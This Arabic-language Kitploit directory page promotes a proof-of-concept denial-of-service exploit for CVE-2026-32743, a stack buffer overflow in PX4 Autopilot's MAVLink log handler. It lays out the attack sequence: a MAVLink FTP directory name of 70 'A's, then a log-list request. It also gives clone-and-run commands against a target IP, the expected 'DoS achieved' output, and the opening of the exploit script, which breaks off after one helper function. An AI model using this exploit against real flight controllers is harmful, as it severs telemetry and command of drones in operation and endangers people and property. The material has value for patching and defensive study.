Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS- — استغلال رفض الخدمة (DoS) عن بُعد لإصدارات PX4 Autopilot ≤1.17.0-rc2 عبر تجاوز سعة المخزن المؤقت المبني على المكدس في MavlinkLogHandler. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-32743-px4-autopilot-mavlinkloghandler-stack-buffer-overflow-dos-
أمان الأنظمة المدمجةأطر الاستغلالأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHubmbanyamer/cve-2026-32743-px4-autopilot-mavlinkloghandler-stack-buffer-overflow-dos-

CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS-

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال رفض الخدمة (DoS) عن بُعد لإصدارات PX4 Autopilot ≤1.17.0-rc2 عبر تجاوز سعة المخزن المؤقت المبني على المكدس في MavlinkLogHandler.

عرض المستودع
30منذ 5 أشهرلم تتم المراجعة بعد

CVE-2026-32743 - تجاوز سعة المخزن المؤقت للمكدس في MavlinkLogHandler الخاص بـ PX4 Autopilot (DoS)

CVE-2026-32743 CVSS CWE PX4 Exploit License Python

GitHub Instagram Twitter


📜 الوصف

CVE-2026-32743 هو تجاوز سعة مخزن مؤقت قائم على المكدس في MavlinkLogHandler الخاص بإصدارات PX4 Autopilot ≤1.17.0-rc2.
مخزن LogEntry.filepath المؤقت يبلغ 60 بايت فقط، لكن sscanf() يحلل مسارات دليل السجلات بدون محدد عرض.

يمكن للمهاجم الذي لديه وصول إلى رابط MAVLink القيام بما يلي:

  1. استخدام MAVLink FTP لإنشاء دليل متداخل بعمق (طول المسار > 60 بايت) داخل /fs/microsd/log/.
  2. طلب قائمة السجلات عبر MAV_CMD_REQUEST_LOG_LIST.
  3. يقوم MavlinkLogHandler المعرض للخطر بنسخ المسار الطويل إلى المخزن المؤقت بسعة 60 بايت → تجاوز سعة المكدس.
  4. تتعطل مهمة MAVLink → فقدان القياس عن بُعد والقدرة على الأوامر → حرمان مستمر من الخدمة (حتى إعادة التشغيل).

تم الإصلاح في: commit 616b25a (تمت إضافة محدد العرض إلى sscanf).


🔥 مخطط تدفق الهجوم

sequenceDiagram
    participant Attacker
    participant PX4 as PX4 Flight Controller
    participant SD as SD Card (/fs/microsd/log/)

    Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
    PX4-->>Attacker: Heartbeat (system/component IDs)
    
    Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
    Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
    PX4->>SD: Create directory (named 70×'A')
    SD-->>PX4: OK
    
    Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
    Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
    PX4->>PX4: MavlinkLogHandler::list() reads log directory
    PX4->>PX4: sscanf(path, "%s", LogEntry.filepath)  ← NO width limit!
    Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
    PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands
    Note over Attacker,PX4: ✅ DoS achieved – flight controller unmanageable

⚙️ المتطلبات الأساسية

  • الهدف يعمل بنظام PX4 ≤ 1.17.0-rc2 مع بطاقة SD مثبتة (تُخزَّن السجلات في /fs/microsd/log/).
  • تمكين MAVLink FTP (مفعل افتراضيًا في معظم إصدارات PX4).
  • وصول شبكي إلى منفذ MAVLink UDP الخاص بوحدة التحكم في الطيران (الافتراضي 14550).
  • Python 3.6+ مع تثبيت pymavlink:
    pip install pymavlink
    

🚀 الاستخدام

git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py <TARGET_IP> [--port <PORT>]
الوسيطالوصفالافتراضي
target_ipعنوان IP لوحدة التحكم في الطيرانمطلوب
--portمنفذ MAVLink UDP14550

مثال

python3 exploit.py 192.168.1.10 --port 14550

المخرجات المتوقعة (DoS ناجح):

[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!

📄 كود الإثبات (PoC)

#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
#   Affected: Versions 1.17.0-rc2 and below
# Tested on: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed in: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py <target_ip> [--port <port>]

print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                            ║
║   ██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗                     ║
║   ██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗                    ║
║   ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝                    ║
║   ██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗                    ║
║   ██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║                    ║
║   ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝                    ║
║                                                                                            ║
║                         [ b a n y a m e r _ s e c u r i t y ]                              ║
║                                                                                            ║
║                  ▸ Silent Hunter  |  Shadow Presence  |  Digital Intel ◂                  ║
║                                                                                            ║
║   Operator : Mohammed Idrees Banyamer  •  Jordan 🇯🇴                                       ║
║   Handle   : @banyamer_security                                                           ║
║                                                                                            ║
║   Exploit  : CVE-2026-32743                                                               ║
║   Target   : PX4 Autopilot • MAVLink • Log Handler                                         ║
║                                                                                            ║
║   Status   : ACTIVE                                                                       ║
║                                                                                            ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")

import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2

def send_ftp_command(mav, seq, payload):
    msg = mav.file_transfer_protocol_encode(
        target_system=mav.target_system,
        target_component=mav.target_component,
        payload=payload
    )
    mav.mav.send(msg)
تنزيل الأداة